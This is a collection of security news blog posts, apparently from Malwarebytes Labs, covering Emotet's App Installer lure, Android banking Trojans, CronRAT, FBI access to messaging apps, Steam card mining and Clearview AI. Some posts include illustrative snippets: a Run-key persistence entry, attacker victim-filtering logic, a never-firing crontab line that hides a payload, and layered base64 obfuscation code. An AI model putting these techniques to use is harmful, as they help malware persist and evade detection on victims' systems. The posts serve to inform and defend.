IT NEWS

Emotet being spread via malicious Windows App Installer packages

As reported by Cryptolaemus on Twitter, and demonstrated step by step by BleepingComputer, Emotet is now being distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.

How does the attack work?

To understand what Microsoft could do about this distribution method, we need to look at how the attacks work. Victims receive URLs via malspam. The emails are made to look like replies to existing conversations by using stolen reply-chain emails, and they ask the receiver to look at an attachment. Clicking the link brings the victim to a fake Google Drive page that prompts them to click a button to preview a PDF document.

Clicking the “Preview PDF” button triggers an ms-appinstaller URL that attempts to open a file with an .appinstaller extension hosted on Microsoft Azure, using URLs at *.web.core.windows.net. Files with the .appinstaller extension are handled by Microsoft’s App Installer. An .appinstaller file is useful if you need multiple users to deploy your MSIX installation package. It is an XML file that you can write yourself or generate, for example, with Visual Studio. The .appinstaller file specifies where your app is located and how to update it.
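For illustration, a minimal .appinstaller file might look like the sketch below. All names, URLs, and version numbers here are hypothetical, not taken from the actual campaign:

```xml
<?xml version="1.0" encoding="utf-8"?>
<AppInstaller
    xmlns="http://schemas.microsoft.com/appx/appinstaller/2018"
    Uri="https://example.web.core.windows.net/app.appinstaller"
    Version="1.0.0.0">
  <!-- Where the actual MSIX/appx bundle is hosted -->
  <MainBundle
      Name="ExamplePDFComponent"
      Publisher="CN=Example Publisher"
      Version="1.0.0.0"
      Uri="https://example.web.core.windows.net/app.appxbundle" />
  <!-- Check for updates each time the app launches -->
  <UpdateSettings>
    <OnLaunch HoursBetweenUpdateChecks="0" />
  </UpdateSettings>
</AppInstaller>
```

The Uri attributes tell App Installer where to fetch the actual bundle, which is why the payload can sit on an Azure-hosted domain while the phishing email only links to the small .appinstaller file.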

When attempting to open an .appinstaller file, the browser will ask whether you wish to open the Windows App Installer program to proceed. In this case, once you agree, you will be shown an App Installer window prompting you to install the “Adobe PDF Component.” This malicious package looks like a legitimate Adobe application: it has a legitimate Adobe PDF icon, a valid certificate that marks it as a ‘Trusted App’, and fake publisher information.

If a user chooses to proceed with the install—and why would they stop this far down the rabbit hole?—App Installer will download and install the malicious appxbundle hosted on Microsoft Azure. This bundle drops a .dll on the affected system and creates a startup entry for this .dll. This startup entry will automatically launch the DLL when a user logs into Windows. At that point you are infected with Emotet.
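Persistence via a startup entry usually means a value under one of the Windows Run registry keys. A hypothetical example of what such an entry might look like follows; the value name, DLL path, and export are illustrative, not taken from an actual Emotet sample:

```text
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    "PdfComponentUpdate" = rundll32.exe "C:\Users\<user>\AppData\Local\PdfComponent\engine.dll",Launch
```

Every value under this key is executed each time the user logs in, which is what relaunches the DLL after a reboot.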

Hosting malicious files on Azure

Microsoft’s Azure cloud services have become an attractive option for cybercriminals to store malicious content. This is not limited to malicious files, as in the case of Emotet: Azure has also been abused to host phishing sites, other fraudulent sites, and command and control servers. Azure is certainly not alone; other content hosting services like Google Drive, Dropbox, and Amazon Web Services are also abused to store malicious content. But critics are hard on Microsoft because it considers itself a security vendor. At the time of writing, the .appinstaller file had been removed, but it was available for download longer than it should have been.

The URL for the .appinstaller now returns a 404 error

While we understand how difficult it is to inspect everything that gets uploaded into your cloud service, and that you can’t study every new customer under a microscope, we also do not know how much time passed between the first report of this new Emotet distribution method and the actual takedown.

Microsoft is receiving flak because its cloud service is hosting the malware, its App Installer is used in the process, and its operating system (Windows) is the target of the attacks. Does that make it an enabler? Not really, and certainly not voluntarily.

Emotet

While we all thought and hoped that Emotet had kicked the bucket, it made a dramatic comeback a few weeks ago. And using new distribution methods is a clear sign that it is serious about the comeback.

So, don’t click those links, even if the URL looks trustworthy, the file icon looks legit, and the file is signed. Check with the alleged sender about whether the message really comes from them and is intended for you.

Stay safe, everyone!

The post Emotet being spread via malicious Windows App Installer packages appeared first on Malwarebytes Labs.

Most people aren’t upgrading to Windows 11: Not the end of the world

Windows 11 is experiencing an apparent lack of uptake among Windows users. If this survey is accurate, less than 1% of 10 million PCs surveyed are running the new operating system. In fact, more machines are using Windows XP.

That may surprise you. It might even seem like a bit of an embarrassing failure for Microsoft. However, the low numbers could well be a very good thing overall. It was always going to be a slow uptake, and we’re going to look at some of the reasons why.

Low numbers are to be expected – and that’s fine

There are quite a few barriers to entry for anyone looking to upgrade to Windows 11. In fact, it’s not just businesses facing Windows headaches. It’s home users too, but perhaps for somewhat different reasons.

  1. Old apps: A big reason ancient operating systems like XP still run in organisations is old, business-critical apps. For most businesses, no one-size-fits-all solution exists. Some of the tech will be outsourced. Bits of it will operate remotely, rather than in-house. There’ll be bespoke applications made by someone who left the organisation 5 years ago. Most folks won’t know how they operate, just how to patch them if something goes wrong. Pulling one out will break lots of business-critical systems, and there’s no guarantee a replacement will work. Oh, and by the way: it only runs on Windows XP. That’s how you end up with XP and other old operating systems all over the place. They’ve carved out their tiny niche, and almost nothing will dislodge them.
  2. Strict requirements and confusing messaging: This boils down to TPM, or Trusted Platform Module. Microsoft made this a requirement to install the newer operating system. It’s an additional security feature which helps keep bad people away from your data. Unfortunately, initial descriptions of TPM were somewhat confusing. The continued state of malaise over TPM is likely keeping folks away from Windows 11 for the time being. Even now, it’s tricky to find people who make business decisions on tech who are familiar with the issue, and have the required equipment to run Windows 11 the way it’s supposed to be run.
  3. Gaming headaches: Many home users have avoided Windows 11 because of the potential impact on gaming performance. People don’t generally want to spend thousands on gaming rigs, then find their expensive graphics card is suddenly underperforming. If they’re running mid-range or cheap cards, they’re probably even more likely to say no. There’s definitely an air of “wait and see” where this is concerned. Nobody wants to mess up their pre-loaded Windows 10 box with a failed 11 upgrade. Folks who built their machines from scratch will probably want to stay with Windows 10 for the time being too. It’s just too much of a leap in the dark at the moment.

These are the main points, but we can think of some more.

Windows 10: ageing like a fine wine

Do people actually need to suddenly jump into Windows 11? What’s the compelling reason for doing so? It seems very likely that for most people, there just isn’t one. Yet.

I often use Windows 10. I’m fine with it, after a few false starts at the beginning. The handful of alterations to core functionality and usability that I’ve heard about aren’t things I’m particularly interested in. They’re not deal-breakers, but I just wonder: “Why bother? This works fine.”

Does Microsoft want people to adopt quickly?

I think we forget that Windows 10 has already been around for 6 years. It’s not a new thing anymore! Microsoft is entirely happy to keep Windows 10 chugging along. Support for it won’t end until October 14, 2025. That’s four more years of Windows 10 action, and it’ll still be used for some time after that. By that point, some of the more peculiar quirks will have been ironed out. Businesses will have a better feel for it.

If we’re lucky, the TPM hardware issues won’t be as big a concern. Some orgs may even have figured out how to update that in-house app from XP to 11 (they will not). And hey, you can always pay for patches on End of Life operating systems, should you really want to.

It seems, on balance, that it’s better to have the rollout happen slowly. Network admins have enough security concerns to worry about. Do they really need to hurl the shiny new Windows 11 into the network and juggle that responsibility too? The numbers seem to suggest not, and it’s possible Microsoft is also happy with this approach.

Whatever your decision, we wish you well in the upgrade struggles to come.


Have you downloaded that Android malware from the Play Store lately?

Security researchers have discovered banking Trojan apps on the Google Play Store, and say they have been downloaded by more than 300,000 Android users.

As you may know, banking Trojans are kitted out for stealing banking data, like the username, password, and two-factor authentication (2FA) codes that you use to log in to your bank account. They are also capable of logging keystrokes on the phone and taking screenshots of what you’re seeing as you use it. All of this is done without the victim’s consent, and without them noticing anything until it’s too late.

The particular malicious apps the ThreatFabric researchers found were disguised to look like apps that an Android user might normally search for, such as QR scanners, PDF scanners, cryptocurrency wallets, and fitness monitors. Knowing that a portion of Android users are aware that malware often sneaks into the Play Store, and are therefore quite wary about what they download, these apps actually come with the functionality they advertise, further easing any doubts in users’ minds about their legitimacy.

But, as users will soon realize, the old test of looking, acting, and quacking like a duck only works on ducks, as these apps begin to show their true intent after they have been installed.

So, how do these benign-looking apps become fully malicious? The cybercriminals behind them introduce malicious code through updates to the apps, slowly but surely. It’s a common evasion tactic that gets their malicious app into the Play Store without raising alarms at the door. Note, however, that the Trojan code is only delivered to an installed app when the attackers choose to push it.

So, the human element is now introduced in an Android attack chain. Obviously, the attackers have adapted this method from the ransomware playbook.

If ransomware attackers can handpick their targets and rummage through files within their compromised networks, these Android attackers can handpick devices “infected” with their apps and manually start the download of the Trojan code in a specific region of the world. To illustrate, let’s say “Fitness App Alpha” is installed on one device in California, USA, and on one in Montreal, Canada. Bad Guy flicks the switch to have Trojan code downloaded into “Fitness App Alpha” in California. This means that “Fitness App Alpha” in California is now Trojanized, while the one in Montreal is not.
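The selective “flick of the switch” described above can be sketched as simple server-side gating logic. This is an illustrative reconstruction in Python, not the attackers’ actual code; all field names and target values are invented:

```python
# Hypothetical sketch of attacker-side victim filtering: the Trojan
# module is only delivered when an infected install matches the
# campaign's region and device criteria.

TARGET_REGIONS = {"US-CA"}                    # e.g. California, USA
TARGET_MODELS = {"Pixel 4", "Galaxy S10"}     # device-based filtering

def should_deliver_payload(device: dict) -> bool:
    """Return True if this install should receive the Trojan update."""
    return (device["region"] in TARGET_REGIONS
            and device["model"] in TARGET_MODELS
            and not device.get("is_emulator", False))  # dodge researcher sandboxes

california = {"region": "US-CA", "model": "Pixel 4"}
montreal = {"region": "CA-QC", "model": "Pixel 4"}

print(should_deliver_payload(california))  # True  -> gets Trojanized
print(should_deliver_payload(montreal))    # False -> stays benign
```

Because the decision is made server-side per device, automated scanners that run the app in the wrong region, on the wrong device, or in an emulator never see the malicious behavior.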

Code sample taken from the app, showing how attackers can target Android users who are customers of the particular financial institutions they are after. This method is used by the actors behind the Anatsa campaign. (Source: ThreatFabric)

Attackers can not only pick their victims based on their region, they can also target Android users based on the device they use, a method used by those behind the Alien campaign. (Source: ThreatFabric)

According to ThreatFabric, filtering “makes automated detection a much harder strategy to adopt by any organization.”

Not only that: incrementally updating the app, location checking, and device checking are also methods attackers use to ensure their app is running on actual Android devices and not in a security researcher’s testing environment.

“This incredible attention dedicated to evading unwanted attention renders automated malware detection less reliable,” the researchers further stated in their blog post. “Actors behind it took care of making their apps look legitimate and useful. There are large numbers of positive reviews for the apps. The number of installations and presence of reviews may convince Android users to install the app.”

In four months, four Android malware families have spread across the Google Play Store: Anatsa, Alien, Hydra, and Ermac. Their campaigns have fooled thousands of Android users, and we can only imagine how much was stolen from victims before the apps were discovered and reported.

How to keep dodgy apps out of your phone

When looking for apps, make time to do your research. If you’re after, say, a QR scanner, searching for “the top QR scanner apps” or “the best QR scanner apps” may be a good start, as there are dozens of articles on the internet about this very subject. If you trust the publisher of these articles, you can be reasonably assured that they have looked into the apps and tested them themselves before giving their recommendations.

Another way is to head straight to the Play Store and look for apps (a) with good reviews, (b) with a large user base, and (c) that have been in the Play Store for quite some time (at least 12 months). Be wary, of course, of reviews that could be fake. But if the app you want ticks most or all of the boxes I mentioned above, dig a little deeper and find out what its problems are and why some users don’t like it.

You could also consider installing security software on your phone. We’d be remiss here if we didn’t mention that Malwarebytes has an Android product.

Lastly, now is probably a good time to also audit your apps and get rid of those that you no longer use or update. You’re safer this way, too.


Here’s what data the FBI can get from WhatsApp, iMessage, Signal, Telegram, and more

Not every secure messaging app is as safe as it would like us to think. And some are safer than others.

A recently disclosed FBI training document shows how much access to the content of encrypted messages from secure messaging services US law enforcement can gain and what they can learn about your usage of the apps.

The infographic shows details about iMessage, Line, Signal, Telegram, Threema, Viber, WeChat, WhatsApp, and Wickr. All of them are messaging apps that promise end-to-end encryption for their users. And while the FBI document does not say this isn’t true, it reveals what type of information law enforcement will be able to unearth from each of the listed services.

Note: A pen register is an electronic tool that can be used to capture data about all telephone numbers dialed from a specific phone line. So if you see it mentioned below, it refers to the FBI’s ability to find out who you have been communicating with.

iMessage

iMessage is Apple’s instant messaging service. It works across Macs, iPhones, and iPads. Using it on Android is hard because Apple uses a special end-to-end encryption system in iMessage that secures the messages from the device they’re sent on, through Apple’s servers, to the device receiving them. Because the messages are encrypted, the iMessage network is only usable by devices that know how to decrypt the messages. Here’s what the document says it can access for iMessage:

  • Message content limited.
  • Subpoena: Can render basic subscriber information.
  • 18 USC §2703(d): Can render 25 days of iMessage lookups to and from a target number.
  • Pen Register: No capability.
  • Search Warrant: Can render backups of a target device; if target uses iCloud backup, the encryption keys should also be provided with content return. Can also acquire iMessages from iCloud returns if target has enabled Messages in iCloud.

Line

Line is a freeware app for instant communications on electronic devices such as smartphones, tablets, and personal computers. In July 2016, Line Corporation turned on end-to-end encryption by default for all Line users, after it had earlier been available as an opt-in feature since October 2015. The document notes on Line:

  • Message content limited.
  • Suspect’s and/or victim’s registered information (profile image, display name, email address, phone number, LINE ID, date of registration, etc.)
  • Information on usage.
  • Maximum of seven days’ worth of specified users’ text chats (Only when end-to-end encryption has not been elected and applied and only when receiving an effective warrant; however, video, picture, files, location, phone call audio and other such data will not be disclosed).

Signal

Signal is a cross-platform centralized encrypted instant messaging service. Users can send one-to-one and group messages, which can include files, voice notes, images and videos. Signal uses standard cellular telephone numbers as identifiers and secures all communications to other Signal users with end-to-end encryption. The apps include mechanisms by which users can independently verify the identity of their contacts and the integrity of the data channel. The document notes about Signal:

  • No message content.
  • Date and time a user registered.
  • Last date of a user’s connectivity to the service.

This seems to be consistent with Signal’s claims.

Telegram

Telegram is a freeware, cross-platform, cloud-based instant messaging (IM) system. The service also provides end-to-end encrypted video calling, VoIP, file sharing and several other features. There are also two official Telegram web twin apps—WebK and WebZ—and numerous unofficial clients that make use of Telegram’s protocol. The FBI document says about Telegram:

  • No message content.
  • No contact information provided for law enforcement to pursue a court order. As per Telegram’s privacy statement, for confirmed terrorist investigations, Telegram may disclose IP and phone number to relevant authorities.

Threema

Threema is an end-to-end encrypted mobile messaging app. Unlike other apps, it doesn’t require you to enter an email address or phone number to create an account. A user’s contacts and messages are stored locally, on each user’s device, instead of on the server. Likewise, your public keys reside on devices instead of the central servers. Threema uses the open-source library NaCl for encryption. The FBI document says it can access:

  • No message content.
  • Hash of phone number and email address, if provided by user.
  • Push Token, if push service is used.
  • Public Key
  • Date (no time) of Threema ID creation.
  • Date (no time) of last login.

Viber

Viber is a cross-platform messaging app that lets you send text messages, and make phone and video calls. Viber’s core features are secured with end-to-end encryption: calls, one-on-one messages, group messages, media sharing and secondary devices. This means that the encryption keys are stored only on the clients themselves and no one, not even Viber itself, has access to them. The FBI notes:

  • No message content.
  • Provides account registration data (i.e. phone number) and IP address at time of creation.
  • Message history: time, date, source number, and destination number.

WeChat

WeChat is a Chinese multi-purpose instant messaging, social media and mobile payment app. User activity on WeChat has been known to be analyzed, tracked and shared with Chinese authorities upon request, as part of the mass surveillance network in China. WeChat uses symmetric AES encryption but does not use end-to-end encryption to encrypt users’ messages. The FBI has less access than the Chinese authorities and can access:

  • No message content.
  • Accepts account preservation letters and subpoenas, but cannot provide records for accounts created in China.
  • For non-China accounts, they can provide basic information (name, phone number, email, IP address), which is retained for as long as the account is active.

WhatsApp

WhatsApp is an American, freeware, cross-platform centralized instant messaging and VoIP service owned by Meta Platforms. It allows users to send text messages and voice messages, make voice and video calls, and share images, documents, user locations, and other content. WhatsApp’s end-to-end encryption is used when you message another person using WhatsApp Messenger. The FBI notes:

  • Message content limited.
  • Subpoena: Can render basic subscriber records.
  • Court order: Subpoena return as well as information like blocked users.
  • Search warrant: Provides address book contacts and WhatsApp users who have the target in their address book contacts.
  • Pen register: Sent every 15 minutes, provides source and destination for each message.
  • If target is using an iPhone and iCloud backups enabled, iCloud returns may contain WhatsApp data, to include message content.

Wickr

Wickr has developed several secure messaging apps based on different customer needs: Wickr Me, Wickr Pro, Wickr RAM, and Wickr Enterprise. The Wickr instant messaging apps allow users to exchange end-to-end encrypted and content-expiring messages, including photos, videos, and file attachments. Wickr was founded in 2012 by a group of security experts and privacy advocates but was acquired by Amazon Web Services. The FBI notes:

  • No message content.
  • Date and time account created.
  • Type of device(s) app installed on.
  • Date of last use.
  • Number of messages.
  • Number of external IDs (email addresses and phone numbers) connected to the account, but not the plaintext external IDs themselves.
  • Avatar image.
  • Limited records of recent changes to account settings, such as adding or suspending a device (does not include message content or routing and delivery information).
  • Wickr version number.

Conclusion

If there is one thing clear from the information in this document it’s that most, if not all, of your messages are safe from prying eyes in these apps, unless you’re using WeChat in China. Based on the descriptions, you can check out which apps are available on your favorite platform and which of the bullet points are relevant to you, to decide which app is a good choice for you.

The safest way, however, is to make sure the FBI doesn’t consider you a person of interest. If it does, even using a special encrypted device can pose some risks.

Stay safe, everyone!


Capcom Arcade Stadium’s record player numbers blamed on card mining

Some of my favourite retro video games are making waves on Steam, but not in the way you might think. Classics such as Strider, Ghosts n’ Goblins, and more are all available as content for Capcom Arcade Stadium. This is an emulator which lets you play 31 arcade games from the 80s/90s. The games themselves are paid downloadable content, but the main emulator download itself is free. It also comes with one free game as a taster of the full edition.

It didn’t have a great reception at launch, because people didn’t like titles being sold in bundles only. As such, it was something of a surprise to see it riding high at the top end of the Steam activity charts in the last few days.

Sure, the games can now be bought individually. But would that really equate to an all-time concurrent tally of 481,088 players? Did people really wake up this week and think “What we need in our lives is 3 different versions of Street Fighter 2”?

The numbers game

Make no mistake, these are some of the biggest numbers you can achieve on Steam and it typically requires a massive AAA+ title to achieve it. For example, right now the three top played games on Steam are:

  1. Counter Strike: Global Offensive with 507,995 players
  2. Dota 2 with 325,679 players
  3. PUBG: Battlegrounds with 150,498 players

These are all huge online games, played against other people. Yet somehow we have the archaic arcade emulator, with its one free game by default, storming into the top three.

These numbers are so vast that Capcom Arcade Stadium has managed to hit 8th place in the all-time records for most simultaneous players. What could have possibly caused this? The faithful translation of arcade controls to gamepads? The ability to rewind the game should you make a mistake? Customising each game’s arcade cabinet before loading up a title?

Nope, it’s bots.

How did bots cause the great player count inflation of 2021?

Generally when we talk about bots in gaming, we mean hacked accounts or PCs performing certain tasks. It could be a DDoS attack, or sending out phishing messages inside game chat, or some other nefarious activity.

In this case, the “bot” is something a little bit different. It’s not something caused by what happens inside the game itself. Rather, it’s a layer of virtual economy and digital goods driving what happens to the player count.

Before we get to the nitty gritty, it’s time to explain the ins and outs of Steam card trading.

Steam card trading

Sometimes folks get confused on this, so for clarity: there are two types of “Steam card”. The first is an actual, physical gift card you can buy in stores. These cards have monetary amounts assigned to them, and they’re a way to preload your Steam account with credit, which you then use to purchase games from the store. You can also buy “digital” versions of these cards which perform the same function.

The other type of card, the one we’re focusing on, is the Steam trading card. These are items which are tied to certain games, but don’t exist within them. They’re essentially cool-looking virtual cards with characters from the game on them. The more you play a game, the more likely you are to be given a free card drop. When you collect all of the cards for a game, you can create a badge for your Steam profile. At the same time, you’ll be given other community-centric items like emoticons, the possibility of discount coupons for other games, or even the option to bump up your Steam level (another profile feature).

The system is designed so you can’t just grab all of the cards by playing. There’s a limit on how many you’ll receive and then you need to get the rest by trading with friends, or buying from the Steam marketplace.

This is a very detailed system with a lot of depth to it. Steam trading is big business, and often one of the focal points for scams, phishes, and malware antics. However, that’s not the case here.

Rather, it appears to be users trying to game the system for their own ends. For once, nobody is compromising accounts and running off with a sack full of stolen logins.

Still, this begs the question: what is happening here?

The wonderful world of card mining

It’s not just Bitcoin hogging all the space in the mines these days. Steam cards can also be mined, and there’s a surprising number of tools available to do it. One of the most popular is something called ArchiSteamFarm. This is a third party tool you can log into with your Steam credentials, and it’ll tell you what can/can’t be farmed. If there are card drops available, you simply tell it which games of yours to “idle” on and we’re off to the card mining races. You don’t have to download the game in order to idle, which makes it super convenient for people wanting cards without gigabytes of downloads and wasted hard drive space.

This is where things get really interesting.

Steam cards usually only drop for paid titles. If you don’t buy the game, you can’t get cards. In this case, the base Capcom Arcade Stadium game is a free download with one free title included. This isn’t (and shouldn’t be!) enough to have cards start dropping.

However, something seems to have gone wrong. All of a sudden, people found they could obtain trading cards despite only having the free game. This meant a huge surge in botting activity to grab cards before someone at Valve—the company behind Steam—fixed it.


As a result, a massive number of card miners fired up their tools (whether ArchiSteamFarm or something else entirely) and idled their way to sweet card victory. As mentioned above, there are limitations on how many cards you can farm. Once you hit the limit, that’s it: no more mining on that game, ever. You have to trade for or buy the rest. So this is, essentially, people just wanting to get in on the ground floor of red-hot card trading action.

Watching Steam achievement totals drop in real time

As this Ars Technica article notes, you can observe clues to the automated activity taking place. One way is to check the Steam achievement numbers. A couple of days ago, around 44.6% of players had the achievement for loading up a game for the first time. Now the number sits at just 7.9%, even lower than the figure quoted in the article. The only way this number makes sense, given the massive user numbers, is if huge numbers of new game owners are using tools to “idle” while prospecting for card drops.
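A quick back-of-the-envelope calculation shows why: if roughly the same fixed group of real players holds the first-launch achievement, the drop from 44.6% to 7.9% implies the pool of game “owners” grew by a factor of about 5.6 in a couple of days. This is an estimate based only on the two percentages, not an official figure:

```python
# Share of owners holding the "first launch" achievement,
# before and after the card-farming rush.
pct_before = 44.6
pct_after = 7.9

# Assuming the absolute number of achievement holders stayed constant:
# owners_before * pct_before == owners_after * pct_after
growth_factor = pct_before / pct_after
print(f"Owner base grew roughly {growth_factor:.1f}x")  # roughly 5.6x
```

Since no retro compilation organically multiplies its player base nearly sixfold overnight, the idling-bot explanation fits the numbers far better than a sudden arcade revival.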

The leaky card pipeline has apparently been fixed, so no amount of idling will produce any more cards. This happens to games occasionally, most notably when an error caused card drops for Life is Strange 2. What usually happens after an incident like this is the market is flooded and card value plummets, so it’s probably a fraught time on the old trading card stock exchange or something.

When retro revivals are no more…

Unfortunately, my dreams of a Strider revival off the back of massive player numbers and a sudden boom in retro gaming now seem unlikely. On the bright side, the peculiar rise in player numbers didn’t involve people up to no good with malware or phishing.

While Valve probably won’t be too pleased by the inadvertent rush on cards, that is at least one small mercy we can be thankful for.


Massive faceprint scraping company Clearview AI hauled over the coals

Life must be hard for companies that try to make a living by invading people’s privacy. You almost feel sorry for them. Except I don’t.

The UK’s Information Commissioner’s Office (ICO)—an independent body set up to uphold information rights—has announced its provisional intent to impose a potential fine of just over £17 million (roughly US$23 million) on Clearview AI.

In addition, the ICO has issued a provisional notice to stop further processing of the personal data of people in the UK and to delete what Clearview AI has, following alleged serious breaches of the UK’s data protection laws.

What is Clearview AI?

Clearview AI was founded in 2017, and started to make waves when it turned out to have created a groundbreaking facial recognition app. You could take a picture of a person, upload it and get to see public photos of that person, along with links to where those photos appeared.

According to its own website, Clearview AI provides a “revolutionary intelligence platform”, powered by facial recognition technology. The platform includes a facial network of 10+ billion facial images scraped from the public internet, including news media, mugshot websites, public social media, and other open sources.

Yes, scraped from social media, which means that if you’re on Facebook, Twitter, Instagram or similar, then your face may well be in the database.

Clearview AI says it uses its faceprint database to help law enforcement fight crimes. Unfortunately it’s not just law enforcement. Journalists uncovered that Clearview AI also licensed the app to at least a handful of private companies for security purposes.

Clearview AI ran a free trial with several law enforcement agencies in the UK, but these trials have since been terminated, so there seems to be little reason for Clearview to hold on to the data.

And worried citizens who wish to have their data removed (something companies must do on request under the GDPR) are often required to provide the company with even more data, including photographs, just to be considered for removal.

It’s not just the UK that’s worried. Earlier this month, the Office of the Australian Information Commissioner (OAIC) ordered Clearview AI to stop collecting photos taken in Australia and remove the ones already in its collection.

Offenses

The ICO says that the images in Clearview AI’s database are likely to include the data of a substantial number of people from the UK, and that these may have been gathered without people’s knowledge from publicly available information online.

The ICO found that Clearview AI has failed to comply with UK data protection laws in several ways, including:

  • Failing to process the information of people in the UK in a way they are likely to expect or that is fair
  • Failing to have a process in place to stop the data being retained indefinitely
  • Failing to have a lawful reason for collecting the information
  • Failing to meet the higher data protection standards required for biometric data (classed as ‘special category data’ under the GDPR and UK GDPR)
  • Failing to inform people in the UK about what is happening to their data
  • And, as mentioned earlier, asking for additional personal information, including photos, which may have acted as a disincentive to individuals who wish to object to their data being processed

Clearview AI Inc now has the opportunity to make representations in respect of these alleged breaches set out in the Commissioner’s Notice of Intent and Preliminary Enforcement Notice. These representations will then be considered and a final decision will be made.

As a result, the proposed fine and preliminary enforcement notice may change, or the ICO may decide to take no further formal action.

There is some hope for Clearview AI if you look at past fines imposed by the ICO.

Marriott was initially expected to receive a fine of 110 million Euros after a data breach that happened in 2014 but wasn’t disclosed until 2018, yet it ended up having to pay “only” 20 million Euros. We can expect to hear a final decision against Clearview AI by mid-2022.

Facial recognition

A facial recognition system is a technology capable of matching a human face from a digital image or a video frame against a database of faces, typically employed to identify and/or authenticate users.
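Under the hood, such a system typically converts each face image into a numeric embedding vector and compares vectors with a similarity metric. The sketch below is a minimal illustration of that matching step, not any vendor’s actual algorithm; the toy three-dimensional embeddings, names, and threshold are all hypothetical (real systems use deep networks producing vectors with hundreds of dimensions).

```python
from math import sqrt

def cosine_similarity(a, b):
    """Cosine similarity between two embedding vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = sqrt(sum(x * x for x in a))
    norm_b = sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

def best_match(probe, database, threshold=0.8):
    """Return the database identity whose embedding is most similar
    to the probe, or None if nothing clears the threshold."""
    best_id, best_score = None, threshold
    for identity, embedding in database.items():
        score = cosine_similarity(probe, embedding)
        if score >= best_score:
            best_id, best_score = identity, score
    return best_id

# Toy embeddings standing in for faceprints in the database.
db = {"alice": [0.9, 0.1, 0.2], "bob": [0.1, 0.9, 0.3]}
print(best_match([0.88, 0.12, 0.25], db))  # closest to "alice"
```

The larger the scraped database, the more probe images will find a match above the threshold, which is exactly why a 10+ billion image collection raises the privacy stakes.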

Facial recognition technology has always been controversial. It makes people nervous about Big Brother. It has a tendency to deliver false matches for certain groups, like people of color. Police departments have had access to facial recognition tools for almost 20 years, but they have historically been limited to searching government-provided images, such as mugshots and driver’s license photos.

Gathering images from the public internet obviously makes for a much larger dataset, but it is not what people intended when they posted those images.

It’s because of the privacy implications that some tech giants have backed away from the technology or halted its development. Clearview AI is clearly not one of them: neither a tech giant, nor a company that cares about privacy.

The post Massive faceprint scraping company Clearview AI hauled over the coals appeared first on Malwarebytes Labs.

CronRAT targets Linux servers with e-commerce attacks

There’s an interesting find over at the Sansec blog, wrapping time and date manipulation up with a very smart RAT attack.

The malware, named CronRAT, isn’t an e-commerce attack compromising payment terminals in physical stores. Rather, it looks to swipe payment details by going after vulnerable web stores and dropping payment skimmers on Linux servers. It’s your classic Magecart attack with a stealthy twist.

This method means it bypasses the protection that visitors to those websites arm themselves with, rigging the game from the start. By the time you get onto the website, everything may look fine at your end, but the stream further upriver has already been polluted. It achieves this thanks to the Linux Cron Job system, which we’ll come back to a little later.

First of all, here’s a brief rundown on what Magecart is, and the difference between client-side and server-side attacks.

What is Magecart?

It’s the collective name used for multiple groups who partake in web skimming. These attacks rely on outdated CMSes, or plugin zero days. They may go after small businesses running a particular e-commerce platform. It’s possible they use services like bulletproof hosting to frustrate researchers and law enforcement. Web shells are a popular tactic. There are even impersonators out there, just to make things even more confusing.

Client-side versus server-side attacks

Client-side is where the people who buy things from websites hang out. These are the places where operations such as Magecart may lurk. It could be bogus JavaScript loading in from untrusted domains, or perhaps some other form of rogue code. You can ward off threats such as these by using browser plugins like NoScript. There’s an element of control over these factors, in terms of how you try to secure your browser.

Server-side is an attack on the merchants. Your security processes and tools may be great, but when someone is directly corrupting the site under the hood, you may be fighting a losing battle. While your typical web shopper’s first run-in with Magecart would be the previously mentioned rogue JavaScript or other code, this attack means browser-based fixes may not help.

With those out of the way, we’ll loop back to Cron and Cron Jobs.

What is Cron?

Cron is a way for people running a Linux system to schedule tasks. Those tasks run at a specified time/date in the future, and are known as Cron Jobs. Where things get interesting is that you can enter any date you like, even ones which don’t exist. As long as the system accepts your input, it’ll take it on board and file it away in the scheduling system.

CronRAT adds various tasks to the cron table with a date specification that would generate runtime errors if they ever triggered. The malware authors have taken advantage of the “any date can be used” functionality and scheduled the tasks for February 31st. Of course, this is a date which doesn’t actually exist, so the tasks never run and the errors never happen.
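For context, a crontab line has five time/date fields (minute, hour, day of month, month, day of week) followed by the command to run. The entries below are illustrative examples only, not actual CronRAT samples; the paths and times are made up. The first line is an ordinary scheduled job. The second is set for day 31 of month 2, i.e. February 31st: each field is within its allowed range, so cron accepts the line, but the date never arrives and the job never fires.

```
# min  hour  day  month  weekday  command
  30   2     *    *      *        /usr/local/bin/nightly-backup.sh
  52   6     31   2      3        /tmp/hypothetical-payload
```

An entry like the second one sits quietly in the cron table, a convenient hiding place that casual inspection is likely to dismiss as a misconfigured job.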

As Sansec puts it:

…the actual malware code is hidden in the task names and is constructed using several layers of compression and base64 decoding.

The payload is a “sophisticated bash program that features self-destruction, timing modulation and a custom binary protocol to communicate with a foreign control server.”
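To make the “several layers of compression and base64 decoding” concrete, here is a generic sketch of layered obfuscation in Python. This is not CronRAT’s actual encoding scheme (Sansec did not publish a reference implementation); the function names and layer count are assumptions for illustration. The idea is simply that wrapping a payload in repeated compress-then-encode rounds yields an opaque ASCII blob that can be stashed in an innocuous-looking spot such as a cron task name.

```python
import base64
import zlib

def pack(payload: bytes, layers: int = 2) -> bytes:
    """Hide a payload under several rounds of compression + base64
    (generic illustration of the layering technique described)."""
    data = payload
    for _ in range(layers):
        data = base64.b64encode(zlib.compress(data))
    return data

def unpack(blob: bytes, layers: int = 2) -> bytes:
    """Peel the layers off again to recover the original payload."""
    data = blob
    for _ in range(layers):
        data = zlib.decompress(base64.b64decode(data))
    return data

script = b'echo "hello from a hidden bash program"'
hidden = pack(script)
assert unpack(hidden) == script  # round-trips cleanly
print(hidden[:32])               # opaque ASCII, nothing like the original
```

Because each layer produces printable ASCII, the result survives anywhere plain text is stored, and a scanner looking for shell keywords in the cron table sees only noise.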

This is definitely one way for Magecart to make waves over the Black Friday period and beyond, into the Christmas season.

The problem of digital skimming

Here are some thoughts from Jerome Segura, our Senior Director of Threat Intelligence:

We’ve known for a long time that there are two different ecosystems when it comes to website security: server-side and client-side. While most security companies focus on the latter, the former is probably the more interesting and perhaps less documented one as it requires access to backend systems. This is an example of a threat that is well crafted and meant to evade detection by default browser-side, but also in some aspects server-side due to its clever obfuscation techniques.

